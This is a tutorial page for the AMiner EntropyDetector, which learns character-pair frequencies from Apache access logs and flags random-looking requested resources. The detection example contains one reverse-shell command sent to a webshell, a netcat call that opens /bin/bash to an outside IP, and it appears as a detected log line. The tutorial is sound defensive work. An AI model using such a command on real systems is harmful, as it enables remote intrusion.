HowTo EntropyDetector

landauermax edited this page Aug 7, 2023 · 11 revisions

For many years, malware has used Domain Generation Algorithms (DGAs) for communication and data exfiltration. As a consequence, many detection techniques have been developed that attempt to recognize domain names that are randomly generated by these algorithms. One of them is a simple yet effective approach called freq. The idea behind this approach is that some characters are more likely to follow each other in the English language (e.g., 'q' is most often followed by 'u'), while other pairs occur only very rarely. Since these character distributions are different in randomly generated strings, we can measure how likely it is that any given string is a real word rather than just a sequence of random characters.

Of course, we first need to find out the occurrence probabilities of each character pair. This blog post suggests building the frequency table from the Alexa list of most popular websites, or from whatever data you want to analyze in your own use case, as long as it corresponds to normal behavior.
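To make the idea of a frequency table more concrete, here is a minimal Python sketch that counts character pairs in a handful of normal strings and estimates how likely one character is to follow another. The function names and the tiny word list are made up for illustration; this is neither the code of freq nor of the AMiner.

```python
from collections import Counter, defaultdict

def build_pair_table(samples):
    """Count how often each character is directly followed by another one."""
    table = defaultdict(Counter)
    for text in samples:
        for prev, nxt in zip(text, text[1:]):
            table[prev][nxt] += 1
    return table

def pair_probability(table, prev, nxt):
    """Estimate P(nxt | prev) from the counts; 0.0 if prev was never seen."""
    total = sum(table[prev].values()) if prev in table else 0
    return table[prev][nxt] / total if total else 0.0

# Tiny stand-in for a real corpus of normal strings (illustrative only).
normal = ["queen", "quick", "quote", "question", "request", "unique"]
table = build_pair_table(normal)

print(pair_probability(table, "q", "u"))  # 'q' is always followed by 'u' here
print(pair_probability(table, "q", "z"))  # this pair was never observed
```

With a realistic corpus the probabilities are of course less extreme, but the principle is the same: pairs that never or rarely occur in normal data pull the score of a string down.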

We really liked this idea and therefore implemented the EntropyDetector for the AMiner. Since the AMiner parses the log data and then applies detection on the extracted values, it is very easy to get started detecting random strings with the default frequency table. However, the real power of the AMiner is semi-supervised learning - we generate a frequency table for the data we analyze on the fly and at the same time check whether new values fit the character distributions observed up to this point. This means that the resulting frequency table fits the monitored data extremely well, and new values that do not fit the learned patterns are detected as anomalies.

Let's have a look at an example. In the following, we will use Apache access logs to learn the frequency table from the file entropy_train.log and use it to detect an attack in the file entropy_test.log. You can download both files from the links. The first lines of the entropy_train.log file look like this:

root@user-5:/home/ubuntu/entropy# head entropy_train.log
10.35.34.242 - - [30/Sep/2021:12:52:49 +0000] "GET / HTTP/1.1" 200 6122 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.35.75 - - [30/Sep/2021:12:52:55 +0000] "GET / HTTP/1.1" 200 9028 "-" "WordPress/5.8.1; https://intranet.price.fox.org"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.8.1 HTTP/1.1" 200 10846 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-content/themes/go/dist/css/design-styles/style-traditional.min.css?ver=1.4.4 HTTP/1.1" 200 1490 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1" 200 4505 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-content/themes/go/dist/js/frontend.min.js?ver=1.4.4 HTTP/1.1" 200 11448 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1" 200 31246 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/wp-embed.min.js?ver=5.8.1 HTTP/1.1" 200 1098 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-content/themes/go/dist/css/style-shared.min.css?ver=1.4.4 HTTP/1.1" 200 23725 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.8.1 HTTP/1.1" 200 5265 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"

Looking at the lines, it is easy to see that one parameter contains many character pairs that partially follow the distributions of natural language: the requested resource, e.g., /wp-includes/js/wp-emoji-release.min.js?ver=5.8.1 in the last line of the sample. This variable is quite difficult to analyze in general, since it is not really categorical: resources are often only temporary, such as caches, and there are simply too many distinct resources being retrieved. However, we can assume that most resources follow a similar pattern: directory names separated by slashes, made up of normal words that repeat in many lines. This makes it a good candidate for our EntropyDetector.
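If you want to take a quick look at the requested resources outside of the AMiner, a small Python sketch like the following can pull them out of the log lines. The regular expression is a simplification made up for this example; inside the AMiner, the ApacheAccessModel parser does this job and exposes the value under its parser path.

```python
import re

# Matches the quoted request part of an access log line,
# e.g. "GET /path HTTP/1.1", and captures the requested resource.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def requested_resource(line):
    """Return the requested resource of an access log line, or None."""
    match = REQUEST_RE.search(line)
    return match.group(1) if match else None

sample = ('10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] '
          '"GET /wp-includes/js/wp-embed.min.js?ver=5.8.1 HTTP/1.1" 200 1098 '
          '"http://intranet.price.fox.org/" '
          '"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"')

print(requested_resource(sample))
```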

We will use the following configuration to train the AMiner:

LearnMode: True

LogResourceList:
        - 'file:///home/ubuntu/entropy/entropy_train.log'

Parser:
        - id: 'START'
          start: True
          type: ApacheAccessModel
          name: 'apache'

Input:
        timestamp_paths: "/accesslog/time"

Analysis:
        - type: "EntropyDetector"
          paths: ["/accesslog/fm/request/request"]
          prob_thresh: 0.15
          default_freqs: False
          output_logline: False

        - type: "ParserCount"
          report_interval: 5

EventHandlers:
        - id: "stpe"
          type: "StreamPrinterEventHandler"
          json: True

Note that LearnMode is set to True, so we generate our frequency table from a file containing only normal behavior. Also, make sure that the input file is correctly set to the entropy_train.log file. Looking at the detector configuration, we can see that we analyze the requested resource (with parser path /accesslog/fm/request/request). Moreover, we set the threshold prob_thresh, which determines how unlikely an observed string needs to be in order to be reported as an anomaly, to 0.15. The lower we set this threshold, the more randomness is allowed and the fewer anomalies we will get. We do not use the default frequency table (default_freqs is set to False) and do not print the parsed log line (output_logline is set to False). We also use the ParserCount to print how many lines have been parsed every 5 seconds, so that we know when all lines are processed. Finally, we print the anomalies on the console using the StreamPrinterEventHandler.

That's all, we are ready to start the AMiner! Note that we use the -C flag to ensure that no model from previous runs interferes with our test. Use the following command:

root@user-5:/home/ubuntu/entropy# aminer -C -c config.yml

And we can see that we already get lots of anomalies. Let's have a closer look at the first two:

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/"
    ],
    "CriticalValue": 0.0,
    "ProbabilityThreshold": 0.15,
    "LogResource": "file:////tmp/entropy_train.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.34.242 - - [30/Sep/2021:12:52:49 +0000] \"GET / HTTP/1.1\" 200 6122 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0\""
    ],
    "Timestamps": [
      1633006369
    ],
    "DetectionTimestamp": 1637654745.74,
    "LogLinesCount": 1
  }
}
{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/wp-includes/css/dist/block-library/style.min.css?ver=5.8.1"
    ],
    "CriticalValue": 0.016666666666666666,
    "ProbabilityThreshold": 0.15,
    "LogResource": "file:////tmp/entropy_train.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] \"GET /wp-includes/css/dist/block-library/style.min.css?ver=5.8.1 HTTP/1.1\" 200 10846 \"http://intranet.price.fox.org/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0\""
    ],
    "Timestamps": [
      1633006375
    ],
    "DetectionTimestamp": 1637654745.74,
    "LogLinesCount": 1
  }
}
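The two critical values in this output (0.0 and 0.0167) can be reproduced with a short Python sketch that scores each value against the pairs seen so far and only then adds it to the table. Note that this is not the AMiner's actual code: the class name is made up, and the scoring rule (the average of the conditional pair probabilities, with a boundary marker at both ends of the value) is an assumption that happens to match the numbers shown here.

```python
from collections import Counter, defaultdict

BOUNDARY = -1  # assumed marker for the start and the end of a value

class OnlineEntropySketch:
    """Hypothetical score-then-learn loop over character pairs."""

    def __init__(self):
        self.freq = defaultdict(Counter)

    def _pairs(self, value):
        # Wrap the character codes in boundary markers and pair up neighbours.
        symbols = [BOUNDARY] + [ord(c) for c in value] + [BOUNDARY]
        return list(zip(symbols, symbols[1:]))

    def critical_value(self, value):
        # Average P(next | previous) over all pairs; unseen pairs count as 0.
        pairs = self._pairs(value)
        total = 0.0
        for prev, nxt in pairs:
            seen = sum(self.freq[prev].values()) if prev in self.freq else 0
            if seen:
                total += self.freq[prev][nxt] / seen
        return total / len(pairs)

    def process(self, value):
        # Score first, then update the table with the new value.
        score = self.critical_value(value)
        for prev, nxt in self._pairs(value):
            self.freq[prev][nxt] += 1
        return score

detector = OnlineEntropySketch()
# Requested resources of the first three lines of entropy_train.log.
values = ["/", "/", "/wp-includes/css/dist/block-library/style.min.css?ver=5.8.1"]
scores = [detector.process(v) for v in values]
print(scores)
```

The third value has 59 characters and therefore 60 pairs including the two boundaries. Only the pair "start of string followed by /" is known at that point, which gives 1/60, or about 0.0167.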

So, the first anomaly corresponds to the first line in the file, where the requested resource is only a single character: /. Makes sense, since there is no model yet and thus every character pair is unusual. Accordingly, the CriticalValue is 0.0, which means that the line has no similarity to anything we have seen before (which is nothing, it is the first line anyway). The second line in the training log file also requests only the character /, and it is not reported as an anomaly since we just learned that this is normal. The third line has a more complex resource being requested: /wp-includes/css/dist/block-library/style.min.css?ver=5.8.1. In this case, the critical value is 0.0167, which is also very low. But what we can observe from the output is that the longer the AMiner is running, the fewer anomalies are reported. The reason for this is that the frequency table is slowly built and gets more and more accustomed to the strings we feed in. In the end, anomalies mostly look like this:

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/wp-cron.php?doing_wp_cron=1633280931.1716330051422119140625"
    ],
    "CriticalValue": 0.1480314621617555,
    "ProbabilityThreshold": 0.15,
    "LogResource": "file:////tmp/entropy_train.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.35.75 - - [03/Oct/2021:17:08:51 +0000] \"POST /wp-cron.php?doing_wp_cron=1633280931.1716330051422119140625 HTTP/1.1\" 200 150 \"-\" \"WordPress/5.8.1; https://intranet.price.fox.org\""
    ],
    "Timestamps": [
      1633280931
    ],
    "DetectionTimestamp": 1637654637.54,
    "LogLinesCount": 1
  }
}

The requested resource is /wp-cron.php?doing_wp_cron=1633280931.1716330051422119140625, so a large part of the string consists of a timestamp. With that many decimal places, the sequence of digits is mostly random, so in a way our EntropyDetector gave us a reasonable result, even though it is not related to an attack. The CriticalValue of the anomaly is 0.148, so maybe we need to set our prob_thresh slightly lower to avoid getting these false positives when trying to detect the attack in the test dataset.

But before we get into that, let's see what the AMiner learned. Print the persistence file as follows:

root@user-5:/home/ubuntu/demo-detectors/entropy# cat /var/lib/aminer/EntropyDetector/Default
[[-1, [[47, 7559], [42, 310]]], [47, [[-1, 337], [119, 9379], [99, 1451], [100, 1758], [98, 275], [115, 907], [116, 1487], [103, 598], [106, 3953], [102, 1305], [63, 127], [112, 1242], [97, 3092], [105, 404], [108, 274], [104, 83], [118, 98], [114, 46], [117, 201], [122, 52], [101, 130], [113, 26], [109, 315], [107, 8], [110, 4]]], [119, [[112, 9676], [101, 830], [111, 459], [105, 48], [61, 4], [115, 28], [46, 18], [45, 4], [97, 4], [104, 4]]], [112, [[45, 8159], [104, 2368], [63, 557], [95, 53], [61, 127], [108, 1471], [100, 1416], [97, 609], [-1, 1811], [115, 26], [114, 439], [111, 198], [116, 98], [110, 64], [101, 38], [105, 101], [98, 14], [46, 4], [47, 4], [37, 12]]], [45, [[105, 2492], [108, 353], [99, 2542], [115, 693], [116, 590], [109, 439], [101, 481], [114, 541], [112, 730], [97, 5356], [53, 414], [119, 105], [52, 192], [57, 110], [98, 236], [117, 56], [106, 27], [104, 34], [50, 34], [110, 34], [102, 75], [111, 52], [118, 42], [103, 14], [100, 20], [113, 4]]], [105, [[110, 12730], [115, 2707], [98, 236], [103, 462], [116, 506], [111, 1008], [45, 228], [99, 683], [114, 597], [100, 182], [109, 347], [102, 124], [108, 171], [49, 26], [112, 86], [97, 304], [47, 131], [101, 65], [38, 4], [122, 4], [118, 4]]], [110, [[99, 2824], [46, 4014], [116, 5262], [45, 2730], [97, 237], [100, 502], [103, 252], [61, 402], [115, 1377], [47, 2716], [101, 251], [37, 26], [107, 187], [44, 120], [117, 110], [111, 495], [108, 81], [105, 32], [110, 18], [98, 4], [121, 12], [95, 1]]], [99, [[108, 2507], [115, 2327], [107, 678], [111, 3299], [114, 177], [117, 1420], [45, 105], [116, 448], [101, 439], [118, 52], [46, 26], [61, 112], [104, 234], [56, 99], [99, 66], [49, 76], [52, 86], [102, 83], [54, 67], [55, 78], [53, 40], [121, 14], [97, 40], [98, 47], [50, 24], [-1, 12], [51, 50], [100, 23], [57, 8], [48, 4]]], [108, [[117, 3655], [111, 1082], [105, 542], [101, 1512], [46, 274], [116, 248], [121, 152], [97, 134], [49, 66], [108, 73], [44, 30], [115, 64], [45, 4]]], [117, [[100, 
2466], [101, 1251], [103, 1170], [122, 1416], [108, 301], [116, 342], [110, 246], [115, 115], [105, 157], [44, 40], [112, 91], [46, 26], [45, 26], [38, 10], [120, 8], [97, 4], [114, 4]]], [100, [[101, 3051], [105, 3528], [46, 787], [111, 177], [45, 793], [109, 4896], [115, 95], [97, 309], [54, 38], [53, 83], [112, 26], [100, 82], [57, 46], [98, 116], [37, 160], [44, 40], [103, 48], [99, 55], [102, 126], [55, 50], [121, 26], [-1, 38], [47, 85], [95, 4], [38, 23], [56, 12], [52, 12], [51, 32], [49, 33], [117, 4], [48, 60], [50, 13]]], [101, [[115, 5428], [46, 1074], [114, 5768], [110, 2696], [109, 1385], [45, 999], [100, 1159], [108, 424], [97, 395], [102, 305], [116, 1074], [112, 100], [98, 430], [103, 167], [99, 187], [56, 110], [-1, 34], [44, 118], [118, 40], [101, 96], [61, 386], [55, 32], [120, 60], [119, 50], [106, 11], [113, 18], [111, 14], [117, 12], [53, 21], [52, 41], [49, 33], [57, 20], [48, 12], [54, 21], [121, 8], [50, 27], [51, 64], [47, 8], [38, 23]]], [115, [[47, 9924], [115, 3668], [116, 3017], [63, 3934], [105, 630], [104, 456], [101, 1366], [99, 1518], [111, 563], [113, 101], [45, 143], [37, 38], [46, 492], [121, 26], [118, 53], [119, 26], [-1, 26], [112, 44], [38, 95], [44, 358], [117, 18], [97, 8]]], [116, [[47, 3213], [121, 1486], [101, 3218], [104, 1645], [114, 294], [105, 778], [115, 1556], [45, 718], [46, 356], [95, 42], [111, 266], [116, 96], [112, 40], [97, 135], [44, 106], [98, 52], [99, 42], [38, 358], [61, 354], [109, 8], [51, 4]]], [98, [[108, 337], [114, 318], [101, 236], [111, 641], [102, 445], [117, 70], [54, 42], [110, 52], [52, 75], [55, 42], [97, 226], [56, 97], [105, 13], [46, 4], [100, 16], [50, 32], [-1, 8], [53, 22], [51, 23], [98, 19], [49, 21], [57, 12], [99, 34], [38, 3]]], [111, [[99, 301], [110, 4796], [47, 598], [106, 210], [-1, 151], [105, 92], [109, 1299], [46, 234], [102, 429], [108, 349], [97, 628], [103, 110], [61, 30], [120, 261], [114, 735], [111, 56], [107, 60], [118, 97], [117, 97], [115, 101], [100, 56], [116, 
30], [112, 56], [38, 115], [119, 8], [98, 4]]], [107, [[45, 302], [115, 76], [98, 160], [116, 26], [95, 160], [38, 40], [46, 53], [101, 116]]], [114, [[97, 862], [121, 1463], [61, 4112], [111, 350], [101, 1452], [100, 738], [116, 617], [55, 101], [45, 209], [105, 159], [103, 30], [109, 74], [47, 168], [117, 57], [115, 59], [46, 226], [73, 30], [38, 40], [44, 88], [98, 62], [112, 65], [80, 13], [110, 4], [108, 4], [118, 4], [95, 8], [-1, 16]]], [97, [[114, 1367], [100, 5608], [108, 238], [116, 446], [115, 1474], [118, 191], [117, 344], [119, 427], [46, 117], [45, 416], [106, 2416], [120, 2416], [110, 136], [55, 38], [101, 208], [97, 73], [98, 144], [49, 135], [53, 43], [103, 114], [44, 40], [99, 602], [102, 68], [105, 27], [56, 56], [112, 22], [121, 32], [54, 36], [51, 26], [52, 46], [57, 28], [-1, 8], [50, 35], [48, 22], [38, 45]]], [121, [[47, 1328], [108, 946], [45, 301], [46, 520], [102, 56], [110, 26], [38, 4], [101, 28], [44, 12], [111, 4], [99, 4], [98, 4], [109, 12]]], [46, [[109, 3591], [99, 1260], [56, 1862], [49, 2815], [52, 1668], [106, 2757], [51, 218], [50, 317], [54, 213], [48, 1144], [105, 165], [112, 2457], [57, 25], [119, 403], [103, 124], [55, 60], [102, 26], [111, 26], [115, 26], [113, 26], [53, 10]]], [109, [[105, 8756], [101, 2082], [98, 383], [111, 359], [109, 218], [103, 197], [115, 66], [97, 98], [45, 26], [112, 400], [117, 26], [99, 26], [46, 8], [108, 8]]], [63, [[118, 3960], [100, 52], [112, 127], [114, 42], [99, 112], [97, 350], [108, 1]]], [118, [[101, 4253], [105, 251], [98, 52], [103, 53], [45, 40], [50, 16]]], [61, [[53, 2037], [49, 1055], [51, 511], [55, 480], [104, 56], [97, 51], [48, 225], [50, 280], [108, 41], [100, 95], [44, 30], [106, 42], [119, 345], [110, 115], [52, 101], [115, 10], [102, 46], [57, 41], [98, 7], [56, 47], [99, 8], [101, 45], [54, 13], [47, 4], [117, 16], [37, 12], [116, 1]]], [53, [[46, 2287], [54, 93], [56, 91], [-1, 223], [48, 98], [50, 85], [49, 50], [55, 126], [97, 51], [100, 54], [102, 73], [52, 120], 
[66, 160], [68, 160], [57, 74], [101, 55], [51, 76], [53, 45], [99, 52], [98, 29], [38, 9]]], [56, [[46, 1847], [57, 62], [50, 108], [55, 107], [48, 72], [49, 93], [53, 114], [110, 26], [51, 124], [56, 124], [102, 81], [-1, 59], [52, 67], [54, 50], [97, 41], [98, 24], [100, 42], [99, 66], [101, 20], [38, 25]]], [49, [[-1, 2146], [46, 865], [54, 526], [50, 283], [57, 87], [56, 121], [51, 561], [99, 143], [55, 109], [49, 218], [48, 333], [53, 83], [52, 123], [97, 58], [37, 40], [121, 26], [45, 26], [38, 145], [102, 62], [101, 55], [98, 24], [100, 28]]], [104, [[101, 934], [97, 206], [112, 2368], [105, 722], [116, 34], [61, 26], [111, 185], [45, 96], [117, 160], [98, 141], [46, 8]]], [103, [[111, 625], [110, 197], [114, 275], [95, 52], [105, 1358], [117, 101], [47, 141], [46, 86], [37, 26], [101, 193], [63, 26], [116, 26], [115, 44], [45, 27], [-1, 63], [65, 28], [103, 19], [97, 70], [61, 1]]], [52, [[46, 649], [-1, 1088], [56, 48], [50, 134], [48, 278], [51, 130], [52, 93], [53, 143], [57, 49], [100, 50], [49, 75], [99, 61], [54, 74], [55, 30], [101, 63], [98, 29], [97, 49], [102, 12], [38, 18]]], [106, [[115, 5617], [113, 1215], [105, 210], [97, 2416]]], [113, [[117, 1276], [114, 101], [67, 13]]], [51, [[46, 1163], [51, 426], [48, 200], [55, 80], [49, 216], [52, 80], [50, 277], [53, 78], [65, 26], [97, 102], [-1, 94], [100, 63], [57, 95], [102, 40], [54, 52], [56, 41], [37, 4], [101, 37], [99, 21], [98, 20], [120, 4], [38, 15]]], [50, [[-1, 685], [49, 202], [52, 74], [54, 169], [51, 107], [57, 96], [55, 124], [70, 152], [48, 178], [50, 97], [98, 34], [46, 301], [53, 161], [99, 77], [97, 43], [101, 20], [38, 151], [56, 52], [37, 16], [100, 62], [102, 65], [47, 4]]], [102, [[114, 195], [97, 817], [111, 1031], [102, 445], [50, 537], [-1, 136], [105, 86], [49, 87], [100, 68], [51, 81], [48, 41], [57, 50], [101, 128], [38, 39], [53, 46], [54, 33], [99, 50], [55, 35], [98, 28], [56, 70], [52, 47]]], [54, [[46, 221], [51, 494], [53, 92], [54, 67], [55, 85], [52, 58], [49, 
111], [57, 150], [98, 60], [97, 63], [-1, 74], [56, 71], [48, 72], [50, 77], [99, 28], [100, 24], [102, 16], [101, 23], [38, 3]]], [48, [[-1, 338], [48, 384], [54, 139], [51, 64], [46, 798], [47, 414], [57, 101], [55, 135], [52, 67], [49, 210], [56, 82], [53, 124], [110, 66], [100, 117], [38, 124], [37, 112], [97, 38], [50, 128], [101, 31], [102, 46], [98, 16], [99, 8], [45, 8]]], [95, [[119, 53], [99, 52], [116, 26], [48, 112], [49, 40], [97, 345], [110, 345], [112, 12], [50, 4], [51, 4], [114, 16], [108, 17], [85, 1]]], [55, [[52, 76], [53, 80], [46, 456], [50, 161], [54, 73], [49, 84], [51, 39], [101, 79], [97, 72], [-1, 132], [57, 88], [99, 58], [98, 74], [100, 42], [102, 36], [56, 82], [55, 58], [48, 95], [38, 91]]], [57, [[54, 83], [48, 220], [52, 47], [57, 69], [49, 70], [56, 86], [100, 45], [102, 50], [-1, 79], [55, 105], [46, 47], [97, 34], [99, 54], [50, 49], [53, 55], [51, 74], [101, 20], [98, 24], [38, 1]]], [42, [[-1, 310]]], [122, [[47, 1140], [45, 276], [120, 52], [97, 4]]], [120, [[46, 2232], [99, 52], [47, 115], [45, 30], [95, 345], [105, 15], [44, 4], [116, 8]]], [37, [[51, 26], [50, 152], [53, 320]]], [65, [[37, 26], [110, 28]]], [70, [[37, 26], [105, 26], [119, 38], [38, 30], [118, 12], [117, 8], [109, 4], [112, 4], [55, 1], [56, 1], [57, 1], [49, 1]]], [38, [[114, 26], [108, 160], [118, 112], [100, 40], [116, 345], [95, 362], [49, 345], [119, 9], [112, 12], [99, 4]]], [66, [[99, 160]]], [68, [[61, 160]]], [73, [[110, 30]]], [44, [[114, 70], [119, 232], [97, 120], [99, 40], [102, 36], [100, 40], [108, 80], [101, 44], [109, 65], [116, 40], [110, 40], [115, 40], [98, 40], [106, 42], [117, 42], [112, 11], [38, 4]]], [67, [[111, 13]]], [80, [[105, 13]]], [85, [[83, 1]]], [83, [[-1, 1]]]]

So, what does that mean? This list of lists contains all the character pairs and their respective occurrence frequencies. But there are no characters! Well, we just use their integer representation to avoid problems with displaying strange characters. For example, we use -1 for the beginning of the string (the non-existing character before the first character), 47 is the / character, and 42 is the * character. So the first list [-1, [[47, 7559], [42, 310]]] means that almost all values (7559) start with / and a few (310) start with *. We also see in the next list ([47, [[-1, 337], [119, 9379], ...]]) that the character / is mostly followed by the character w (with integer representation 119). We can easily verify this manually by looking at the sample lines from before. There are even more occurrences of this pair than there are lines, which is simply explained by the fact that the character pair /w sometimes also occurs in the middle of the strings.
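To read the table more comfortably, the integers can be turned back into characters. The following Python sketch does this for three entries copied from the output above. It assumes that the persisted content parses as JSON, as its printed form suggests, and the helper names are made up. Note that -1 also shows up as a follower (for example in [42, [[-1, 310]]]), which presumably marks the end of the string; the sketch therefore prints it as a generic boundary.

```python
import json

# Three entries copied from the persisted frequency table.
excerpt = ("[[-1, [[47, 7559], [42, 310]]], "
           "[113, [[117, 1276], [114, 101], [67, 13]]], "
           "[42, [[-1, 310]]]]")

def symbol(code):
    """Render an integer code as a character; -1 marks a string boundary."""
    return "<boundary>" if code == -1 else chr(code)

def decode(raw):
    """Convert the list of lists into {previous: {next: count}} with readable keys."""
    return {symbol(prev): {symbol(nxt): count for nxt, count in followers}
            for prev, followers in json.loads(raw)}

decoded = decode(excerpt)
for prev, followers in decoded.items():
    print(prev, followers)
```

The entry for q nicely confirms the intuition from the beginning: in this data, q is followed by u in 1276 cases and by anything else only rarely.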

Now that we know how the EntropyDetector works, let's try to find the attack in the test file. We use the following configuration (we will name it config_test.yml to avoid confusion):

LearnMode: False

LogResourceList:
        - 'file:///home/ubuntu/demo-detectors/entropy/entropy_test.log'

Parser:
        - id: 'START'
          start: True
          type: ApacheAccessModel
          name: 'apache'

Input:
        timestamp_paths: "/accesslog/time"

Analysis:
        - type: "EntropyDetector"
          paths: ["/accesslog/fm/request/request"]
          prob_thresh: 0.12
          default_freqs: False
          output_logline: False

        - type: "ParserCount"
          report_interval: 5

EventHandlers:
        - id: "stpe"
          type: "StreamPrinterEventHandler"
          json: True

Note that we switched the LearnMode to False, since we think that our frequency table is sufficiently stable to correctly differentiate normal from anomalous behavior. We also change the input file to the entropy_test.log file. Finally, we change the prob_thresh to 0.12, because we hope that this will avoid getting too many false positives. We must be careful not to set the threshold too low, otherwise we will not detect anything at all!
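The effect of the lower threshold can be checked against the false positive from the training run. The sketch below assumes that a value is reported when its critical value is strictly lower than prob_thresh; the function name is made up for illustration.

```python
def is_reported(critical_value, prob_thresh):
    """Assumed rule: report a value if its critical value is below the threshold."""
    return critical_value < prob_thresh

# Critical value of the wp-cron.php request seen during training.
wp_cron = 0.1480314621617555

for prob_thresh in (0.15, 0.12):
    print(prob_thresh, is_reported(wp_cron, prob_thresh))
```

With 0.15 the wp-cron.php request is reported, with 0.12 it is not, which is exactly the kind of false positive we want to get rid of.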

Now, run the AMiner again. Be careful not to use the -C flag this time, or the AMiner will delete the learned model and you will have to retrain. Use the following command:

root@user-5:/home/ubuntu/entropy# aminer -c config_test.yml
{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": false,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951"
    ],
    "CriticalValue": 0.0997565057530329,
    "ProbabilityThreshold": 0.12,
    "LogResource": "file:////tmp/entropy_test.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.32.78 - - [04/Oct/2021:05:58:02 +0000] \"GET /static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951 HTTP/1.1\" 200 131 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/93.0.4577.63 Safari/537.36\""
    ],
    "Timestamps": [
      1633327082
    ],
    "DetectionTimestamp": 1637656628.43,
    "LogLinesCount": 1
  }
}

We only get a single anomaly this time. Looking closer, we can clearly see that the requested resource is a command sent to a webshell called evil.php: /static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951. The EntropyDetector successfully detected that the string does not fit the usual resources and assigned it a CriticalValue of about 0.0998, which is lower than our prob_thresh of 0.12, so the value is reported as an anomaly.
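When there are more anomalies than fit on one screen, it helps to reduce each event to the affected value and its critical value. Since the console output consists of several JSON documents printed one after another, a plain json.loads on the whole text would fail. The following Python sketch walks through such a text with json.JSONDecoder.raw_decode. It assumes that the captured text contains nothing but JSON documents, and the two events are shortened stand-ins for the real output.

```python
import json

def iter_json_objects(text):
    """Yield each document from a string of back-to-back JSON documents."""
    decoder = json.JSONDecoder()
    pos = 0
    while pos < len(text):
        # raw_decode does not skip leading whitespace, so do it here.
        if text[pos].isspace():
            pos += 1
            continue
        obj, pos = decoder.raw_decode(text, pos)
        yield obj

def summarize(event):
    """Return the affected values and the critical value of one anomaly."""
    component = event["AnalysisComponent"]
    return component["AffectedLogAtomValues"], component["CriticalValue"]

# Shortened events standing in for captured console output.
captured = '''
{"AnalysisComponent": {"AffectedLogAtomValues": ["/"], "CriticalValue": 0.0}}
{"AnalysisComponent": {
  "AffectedLogAtomValues": ["/static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951"],
  "CriticalValue": 0.0997565057530329}}
'''

events = list(iter_json_objects(captured))
for event in events:
    print(summarize(event))
```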

The EntropyDetector has all kinds of useful parameters that can be set in the configuration. Check out the documentation here.